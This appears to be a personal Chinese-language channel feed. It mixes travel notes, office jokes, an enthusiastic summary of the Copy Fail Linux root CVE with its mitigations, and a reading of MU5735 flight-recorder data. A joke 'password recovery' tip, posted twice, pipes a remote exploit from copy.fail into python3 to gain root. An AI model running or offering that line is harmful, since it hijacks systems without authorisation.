The idiot's channel. Updating depends on mood. Fresh man READ PIN please.

Only write articles in Chinese(Simplified).

Bachelor | EX-PLCTer | ADBC | Sichuan | Street Dancer.
今日立夏。
四姑娘山这个雪盲症,我眼睛要瞎了……
久旱逢甘霖,他乡遇故知。
洞房花烛夜,金榜题名时。
如果有什么,能代表我心目中雪山的圣洁。
果然还是很喜欢风。
无论是怎样的风。
康定。
啊,鸭川。
想到了从朋友那儿听到的去年这个时候的故事:他们两位在鸭川吹风,其中一位心里有事(想着怎么跟另一位表白呢),一直在揪草;另一位看在眼里,周围的事物一点没记住,光记着有一个可爱的人在揪草。
https://fixupx.com/akarusa/status/2039964935485300773 qp (@akarusa)
虽然我基本看不懂 write-up 在说什么,但发现这个 CopyFail 的人真的太帅了 https://xint.io/blog/copy-fail-linux-distributions#how-we-found-it-9

TLDR,十年 ctf 经验的韩国人 Taeyang Lee (https://0wn.kr/) 在今年初的 kernelCTF 工作上意识到 AF_ALG + splice 可能会有潜在的安全问题,这个直觉引导他和同事用 Xint (An AI-driven penetration testing platform) 在内核里搜索这种模式,prompt 很短:

This is the linux crypto/ subsystem. Please examine all codepaths reachable from userspace syscalls. Note one key observation: splice() can deliver page-cache references of read-only files (including setuid binaries) to crypto TX scatterlists.


Xint 找了一个小时找到了这个 bug。

太帅了,简直是新时代人类 AI 协作典范。 Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
TimeAxis
Linux 密码找回教程: 1. curl https://copy.fail/exp | python3 && su 2. passwd root 3. 设置你的新密码
Linux 密码找回教程: 1. curl https://copy.fail/exp | python3 && su 2. passwd root 3. 设置你的新密码
#今天又看了啥 #CVE #security
https://copy.fail/
CVE-2026-31431

Copy Fail 是一个极其严重的 Linux 内核本地提权(LPE)漏洞,编号 CVE-2026-31431

要点

- 🎯 纯逻辑漏洞,无需 race condition,无需内核偏移,一次成功
- 📦 仅 732 字节 的 Python 脚本(stdlib only),在所有主流 Linux 发行版上通用
- 影响 2017 年以来 构建的所有 Linux 内核,潜伏近十年
- 🔬 漏洞链:authenesn 逻辑 bug → AF_ALG(内核加密 API)→ splice()4 字节 page-cache 写入,直接修改 setuid 二进制的内存页
- 🔓 任何本地普通用户 → 瞬间 root
- 🐳 容器逃逸、跨租户提权、CI runner 沦陷

影响面

| 场景 | 风险 |
|------|------|
| 多租户 Linux 主机 | 🔴 任何用户变 root |
| Kubernetes / 容器集群 | 🔴 跨容器/跨租户 |
| CI runners (GitHub Actions 自托管等) | 🔴 PR 提权到 runner root |
| 云 SaaS 运行用户代码 | 🟡 租户变宿主 root |
| 普通单租户服务器 | 🟢 需配合其他入口 |
| 个人笔记本 | 🟢 已有本地访问后提权 |


缓解措施

1. 更新内核 — 主线 commit a664bf3d603d(回滚 2017 年的 in-place 优化)
2. 临时缓解 — 禁用 algif_aead 模块:
  
   echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
   rmmod algif_aead 2>/dev/null || true
  

   不影响 dm-crypt/LUKS、SSH、IPsec、OpenSSL 默认配置等绝大多数常用功能
四不:不清楚,不了解,不知道,不是我
上班直接睡,下班直接走
三原则:不明确,不拒绝,不签字
三不干:难的不干,累的不干,能不干的不干
四不错:多干多错,少干少错,不干不错,不错不错
四不伤害:不伤害自己,不被别人伤害,保护自己不被他人伤害,保证不伤害自己
上班有五好:好困,好累,好烦,好饿,好的
两按:按时吃饭,按时下班
最后就是把尿喝白,把电充绿,把事儿办黄,完美的一天下班
4.7 Opus
留下来的解释是:操纵者的精神状态是冷静的、是有选择的。
具体来说,当时坐在操纵装置后面的人知道自己在干什么、知道哪些动作有用、哪些动作没必要——
双发已被切断、推力对称损失,本来就不需要用舵补偿不平衡,所以不用;
维持俯冲只需要安定面配平加推杆,方向舵介入反而会引入侧滑、增加阻力、可能让飞机自然抬头,所以不动;
滚转输入(无论是主动施加还是与对方对抗)则要在驾驶盘上持续。
换句话说,踏板的零线比上面那些剧烈震荡的曲线更能说明问题:剧烈输入可以由很多原因产生(恐慌、争夺、本能反应都可能),但「在整体激烈输入的背景下,唯独某一个轴被精确地保持中立」,只在「操作者清楚自己想要什么、并克制了不必要的动作」这一种情境下才会出现。
有人援引 Freedom of Information Act (FOIA) 向 美国国家运输安全委员会(NTSB)申请披露 MU5735(东方航空 5735)的数据。

NTSB 依 FOIA 法 公开了 所有备份的 飞行数据记录仪(FDR,Flight Data Recorder)的数据,没有披露座舱通话记录器 (CVR,Cockpit Voice Recorder)的录音(因 NTSB 没有留存备份)。

相关文件被重命名后上传到 GitHub: https://github.com/haohaoh4/take_out

关键图表可在 report.pdf 文件中的第 25、26、27 页找到。可以注意到:

1. 飞机刚开始失控时,两部引擎均被关闭(两部引擎的 Cut Off 开关均被置于 CUTOFF 位而非 RUN 位)
2. 飞机刚开始失控时,自动驾驶被关闭(自动驾驶关闭告警 AP Warning 1 与 AP Warning 2 触发,自动驾驶开关 CMD FCC 关闭)
3. 飞机失控期间,记录到 Control Wheel Position 操纵盘全程产生剧烈输入
4. 飞机失控期间,副翼(Aileron)全程作动、升降舵(Elevator)仅在失控后期向下作动、方向舵(Rudder)全程没有作动